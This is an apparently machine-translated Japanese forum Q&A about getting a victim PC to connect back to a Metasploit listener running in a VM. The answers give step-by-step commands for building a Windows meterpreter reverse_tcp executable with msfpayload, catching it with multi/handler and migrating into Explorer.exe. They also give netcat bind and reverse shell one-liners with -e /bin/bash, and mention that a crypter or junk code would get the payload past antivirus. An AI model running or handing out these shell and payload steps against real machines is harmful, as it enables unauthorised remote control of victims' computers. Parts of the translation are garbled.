msfconsoleはmetasploit
のクールなオープンソースペンテストツールです。
エクスプロイトが有効になると、犠牲者にペイロードを設定できます。持続的な接続のために、meterpreterが必要になる場合があります。
ただし、msfconsoleを実行している仮想マシンでセキュリティをテストすることがよくあります。
パブリックIPがない場合、被害者のPCはVMのローカルサーバーにバインドできますか?
いくつかの提案?
Metasploitを使用していることを知ることは良い兆候です。
まず、以下を実行してペイロードを作成する必要があります。
msfpayload windows/metepreter/reverse_tcp LHOST="your local IP without quotations" LPORT="any specified port you operate on" X > filenamehere.exe
次に、ターミナルに入力するときに、番号順にこれらの手順に従います。
1. msfconsole
2. use exploit/multi/handler
3. set PAYLOAD windows/meterpreter/reverse_tcp
4. set LHOST "ip you used when creating the payload in the first step without quotations"
5. set LPORT "port you used when creating the payload in the first step without quotations"
6. exploit
エクスプロイトを入力した後、正しく従えば、次のようなメッセージがターミナルに表示されます。
[*] Started reverse handler on "IP Address"
[*] Starting the payload handler...
ここで、最初のステップで作成したペイロードを使用して、「犠牲者」として分類しているマシンで実行します。もちろん、これは、ウイルス(ペイロード)がクリプターによって暗号化されていないか、ペイロードを非表示にするジャンクコードでコーディングされていないため、アンチウイルスを使用している場合は機能しません。被害者のコンピュータでペイロードを実行すると、ターミナル内でmeterpreter
セッションを取得します。
meterpreter
セッションにいる場合、最初に実行する必要があるのはExplorer.exeに移行することであり、ターミナルに次のように入力してこれを実行できます。
ps (shows the current running processes on the computer with a number ID on the left of it)
migrate (id of Explorer.exe)
Meterpreterセッションを楽しんでください。
パブリックIPがない場合、被害者のPCはVMのローカルサーバーにバインドできますか?
これは可能ですが、状況によって異なります。 VMマシンIPがコンピュータのローカルである場合、通常は198
IP。それはとにかく私といつも一緒に起こることです、それはそれがローカルIPであるので「犠牲者」に役に立たないようにします。 VPNを介したTCP接続をそのまま暗号化せず、被害者が正しい知識を持っている場合、たとえば、被害者は接続ログを表示し、接続の送受信を確認でき、接続は失敗します。暗号化されておらず、パブリックIPが平易に表示されている場合、彼は [〜#〜] dox [〜#〜] を実行したり、知っている方法で情報を取得したりできます。
お役に立てば幸いです。
私の知る限り、ゲストOSがホストと物理ネットワークインターフェイスを共有するように、VMを構成できます。その場合、
nc -nlvp 8080
リスナーは外の世界にも耳を傾けています。これでうまくいくはずです。
バインドシェル:ローカル接続で受信ポートをリッスンするポートを設定できます。 nc -nvlp 8080 -e /bin/bash
...リモートマシンがネットワークIPアドレスに接続すると、bash環境への接続が開かれます。
リバースシェル:-e/bin/bash ...なしでOWNマシンにバインドシェルを設定し、victumマシンでnc -nv YOUR.IP.ADDR.HERE 8080 -e /bin/bash
を実行します。
接続の1つがNATの背後にあるように聞こえますか?したがってIPなし?これが当てはまる場合は、使用できるIPアドレスがある場所にnc -nvlp 8080
を設定する必要があります。
メタスプロイトと言ったのは知っていますが、これはつながりの違いを説明し理解するための良い方法です。
metasploitを使用すると、reverse_tcpまたはbind_tcpペイロードを試すことができます